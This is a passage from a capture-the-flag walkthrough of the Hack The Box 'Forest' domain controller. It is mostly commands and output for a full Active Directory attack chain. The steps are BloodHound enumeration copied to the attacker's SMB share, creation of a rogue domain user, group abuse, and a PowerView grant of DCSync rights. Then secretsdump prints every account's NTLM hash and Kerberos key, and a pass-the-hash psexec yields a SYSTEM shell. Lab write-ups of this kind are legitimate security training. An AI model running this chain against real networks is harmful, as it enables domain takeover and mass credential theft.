*Evil-WinRM* PS C:\Users\svc-alfresco> .\SharpHound.exe --collectionmethods All --domain htb.local --ldapUsername svc-alfresco --ldappassword s3rvice
2022-03-27T05:16:37.0031421-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-03-27T05:16:37.0656410-07:00|INFORMATION|Initializing SharpHound at 5:16 AM on 3/27/2022
2022-03-27T05:16:38.8781460-07:00|INFORMATION|Loaded cache with stats: 120 ID to type mappings.
 120 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2022-03-27T05:16:38.8781460-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-03-27T05:16:40.0500234-07:00|INFORMATION|Beginning LDAP search for htb.local
2022-03-27T05:16:40.3000250-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-03-27T05:16:40.3000250-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-03-27T05:17:10.7534462-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 42 MB RAM
2022-03-27T05:17:24.6751174-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2022-03-27T05:17:24.7064451-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2022-03-27T05:17:24.8939084-07:00|INFORMATION|Status: 161 objects finished (+161 3.659091)/s -- Using 46 MB RAM
2022-03-27T05:17:24.8939084-07:00|INFORMATION|Enumeration finished in 00:00:44.8591855
2022-03-27T05:17:25.0033515-07:00|INFORMATION|SharpHound Enumeration Completed at 5:17 AM on 3/27/2022! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc-alfresco> ls


    Directory: C:\Users\svc-alfresco


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        9/23/2019   2:16 PM                Desktop
d-r---        9/22/2019   4:02 PM                Documents
d-r---        7/16/2016   6:18 AM                Downloads
d-r---        7/16/2016   6:18 AM                Favorites
d-r---        7/16/2016   6:18 AM                Links
d-r---        7/16/2016   6:18 AM                Music
d-r---        7/16/2016   6:18 AM                Pictures
d-----        7/16/2016   6:18 AM                Saved Games
d-r---        7/16/2016   6:18 AM                Videos
-a----        3/27/2022   5:17 AM          17775 20220327051724_BloodHound.zip
-a----        3/27/2022   5:17 AM          19811 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a----        3/27/2022   1:18 AM         563259 PowerUp.ps1
-a----        3/27/2022   3:51 AM         906752 SharpHound.exe

Lets copy the ingestors output to our local machine,

*Evil-WinRM* PS C:\Users\svc-alfresco> copy 20220327051724_BloodHound.zip \\10.10.14.4\MONISH\

Now analysing the BloodHound output,

These are the components showed on the home page, lets find out the Domain Admins,

Lets analyse the shortest path from our owned principal to the Administrator of this domain,

But, even though if we PS-Remote to the machine, we could not dump hashes using mimikatz of some compatibility issue

Here Service Accounts is a member of Privileged IT Accounts

And Privileged IT Accounts is also a member of Remote Management Users and Account Operators

Using Remote Management Users we could add users to enable PS-Remoting

And we also have access over Account Operators

If you see in this graph, from the shortest path to Domain Admins can also be done by WriteDacl ACL of Exchange Windows Permission

Image

And we also have GenericAll ACL for Exchange Windows Permission from Account Operators

Privilege Escalation

We are already a member of the required groups,

*Evil-WinRM* PS C:\Users\svc-alfresco> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Account Operators                  Alias            S-1-5-32-548                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
HTB\Privileged IT Accounts                 Group            S-1-5-21-3072663084-364016917-1341370565-1149 Mandatory group, Enabled by default, Enabled group
HTB\Service Accounts                       Group            S-1-5-21-3072663084-364016917-1341370565-1148 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192
*Evil-WinRM* PS C:\Users\svc-alfresco> 

Since we are already a member of the required groups, we need to just make use of the GenericAll to add a new user to Exchange Windows Permission,

Creating a new user in the domain

*Evil-WinRM* PS C:\Users\svc-alfresco> net users /domain

User accounts for \\

-------------------------------------------------------------------------------
$331000-VK4ADACQNUCA     Administrator            andy
DefaultAccount           Guest                    HealthMailbox0659cc1
HealthMailbox670628e     HealthMailbox6ded678     HealthMailbox7108a4e
HealthMailbox83d6781     HealthMailbox968e74d     HealthMailboxb01ac64
HealthMailboxc0a90c9     HealthMailboxc3d7722     HealthMailboxfc9daad
HealthMailboxfd87238     krbtgt                   lucinda
mark                     santi                    sebastien
SM_1b41c9286325456bb     SM_1ffab36a2f5f479cb     SM_2c8eef0a09b545acb
SM_681f53d4942840e18     SM_75a538d3025e4db9a     SM_7c96b981967141ebb
SM_9b69f1b9d2cc45549     SM_c75ee099d0a64c91b     SM_ca8c2ed5bdab4dc9b
svc-alfresco
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\svc-alfresco> net user aidenpearce369 C@ntH4ckM3 /add /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco> net users /domain

User accounts for \\

-------------------------------------------------------------------------------
$331000-VK4ADACQNUCA     Administrator            aidenpearce369
andy                     DefaultAccount           Guest
HealthMailbox0659cc1     HealthMailbox670628e     HealthMailbox6ded678
HealthMailbox7108a4e     HealthMailbox83d6781     HealthMailbox968e74d
HealthMailboxb01ac64     HealthMailboxc0a90c9     HealthMailboxc3d7722
HealthMailboxfc9daad     HealthMailboxfd87238     krbtgt
lucinda                  mark                     santi
sebastien                SM_1b41c9286325456bb     SM_1ffab36a2f5f479cb
SM_2c8eef0a09b545acb     SM_681f53d4942840e18     SM_75a538d3025e4db9a
SM_7c96b981967141ebb     SM_9b69f1b9d2cc45549     SM_c75ee099d0a64c91b
SM_ca8c2ed5bdab4dc9b     svc-alfresco
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\svc-alfresco> 

Now using the GenericAll we are adding a new user to the group,

Adding our new user into the target group,

*Evil-WinRM* PS C:\Users\svc-alfresco> net group "Exchange Windows Permissions"
Group name     Exchange Windows Permissions
Comment        This group contains Exchange servers that run Exchange cmdlets on behalf of users via the management service. Its members have permission to read and modify all Windows accounts and groups. This group should not be deleted.

Members

-------------------------------------------------------------------------------
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco> net group "Exchange Windows Permissions" /add aidenpearce369
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco> net group "Exchange Windows Permissions"
Group name     Exchange Windows Permissions
Comment        This group contains Exchange servers that run Exchange cmdlets on behalf of users via the management service. Its members have permission to read and modify all Windows accounts and groups. This group should not be deleted.

Members

-------------------------------------------------------------------------------
aidenpearce369
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco> 

Adding our new user to Remote Management Users enable PS-Remoting access,

*Evil-WinRM* PS C:\Users\svc-alfresco> net localgroup "Remote Management Users"
Alias name     Remote Management Users
Comment        Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.

Members

-------------------------------------------------------------------------------
Privileged IT Accounts
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco> net localgroup "Remote Management Users" /add aidenpearce369
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco> net localgroup "Remote Management Users"
Alias name     Remote Management Users
Comment        Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.

Members

-------------------------------------------------------------------------------
aidenpearce369
Privileged IT Accounts
The command completed successfully.

Switching to our new user,

┌──(kaliaidenpearce369)-[~/SMBShare]
└─$ evil-winrm -u aidenpearce369 -p C@ntH4ckM3 -i 10.10.10.161

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\aidenpearce369\Documents> whoami
htb\aidenpearce369
*Evil-WinRM* PS C:\Users\aidenpearce369\Documents> hostname
FOREST

Lets use the WriteDACL ACL to give access to DCSync rights to our new user,

Crafting the credential object for our new user,

*Evil-WinRM* PS C:\Users\aidenpearce369\Documents> cd ..
*Evil-WinRM* PS C:\Users\aidenpearce369> $pass = convertto-securestring 'C@ntH4ckM3' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\aidenpearce369> $cred = New-Object System.Management.Automation.PSCredential ('HTB\aidenpearce369', $pass)

We need PowerView to write the DCSync ACL,

*Evil-WinRM* PS C:\Users\aidenpearce369> copy \\10.10.14.4\MONISH\PowerView.ps1 .
*Evil-WinRM* PS C:\Users\aidenpearce369> ls


    Directory: C:\Users\aidenpearce369


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        7/16/2016   6:18 AM                Desktop
d-r---        3/27/2022   8:05 AM                Documents
d-r---        7/16/2016   6:18 AM                Downloads
d-r---        7/16/2016   6:18 AM                Favorites
d-r---        7/16/2016   6:18 AM                Links
d-r---        7/16/2016   6:18 AM                Music
d-r---        7/16/2016   6:18 AM                Pictures
d-----        7/16/2016   6:18 AM                Saved Games
d-r---        7/16/2016   6:18 AM                Videos
-a----        3/27/2022   5:33 AM         770279 PowerView.ps1


*Evil-WinRM* PS C:\Users\aidenpearce369> . ./PowerView.ps1
*Evil-WinRM* PS C:\Users\aidenpearce369> Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity aidenpearce369 -Rights DCSync

DCSync Privilege is added to our new user, we can easily dump all hashes using DCSync Attack

We can do that using impacket-secretsdump remotely or by using mimikatz locally on target machine

Now lets dump the secrets using the DCSync permission of our new user,

┌──(kaliaidenpearce369)-[~]
└─$ impacket-secretsdump aidenpearce369:C@ntH4ckM3@10.10.10.161
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
aidenpearce369:9602:aad3b435b51404eeaad3b435b51404ee:0cb69e78807bb0bce38103060a3e4628:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:f6bec6f0744f874b2347f59f9267b449:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4
htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e
htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e
htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf
htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd
htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e
htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e
htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed
htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983
htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91
htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f
htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a
htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c
htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8
htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d
htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81
htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6
htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5
htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a
htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2
htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29
htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7
htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538
htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702
htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352
htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d
htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701
htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd
htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36
htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb
htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c
htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3
htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054
htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161
htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a
htb.local\sebastien:des-cbc-md5:702a3445e0d65b58
htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5
htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f
htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6
htb.local\andy:des-cbc-md5:a2ab5eef017fb9da
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd
aidenpearce369:aes256-cts-hmac-sha1-96:f7eafd55f28a0041db1cec4dfa3c620749c4ebf92a5da4edc49ada8a89b9fed1
aidenpearce369:aes128-cts-hmac-sha1-96:161f1c6ca692ea2a4e06779933a50770
aidenpearce369:des-cbc-md5:07fd8615a7c498b0
FOREST$:aes256-cts-hmac-sha1-96:9314a457b8b3f34e9b5ec2ffc39329c3ff00dd3514a1ed5c6cdf445882946517
FOREST$:aes128-cts-hmac-sha1-96:55394fdffa1beff12e98abe8ccec8e3d
FOREST$:des-cbc-md5:758ac8c20e5e43f7
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up...

Now we have the NTLM hash of Administrator

Lateral Movement

Lets use the NTLM hash of the Administrator to perform Pass The Hash attack

Using psexec for PTH attack,

┌──(kaliaidenpearce369)-[~]
└─$ impacket-psexec htb.local/Administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file GxOgHmkQ.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service MMTl on 10.10.10.161.....
[*] Starting service MMTl.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
FOREST

C:\Windows\system32> cd ../../
 
C:\> cd Users\Administrator\Desktop
 
C:\Users\Administrator\Desktop> more root.txt
<ROOT FLAG>

C:\Users\Administrator\Desktop> 

We can also use wmiexec and many other tools along with the NTLM hash of the Administrator

After dumping all hashes, it would be a full domain takeover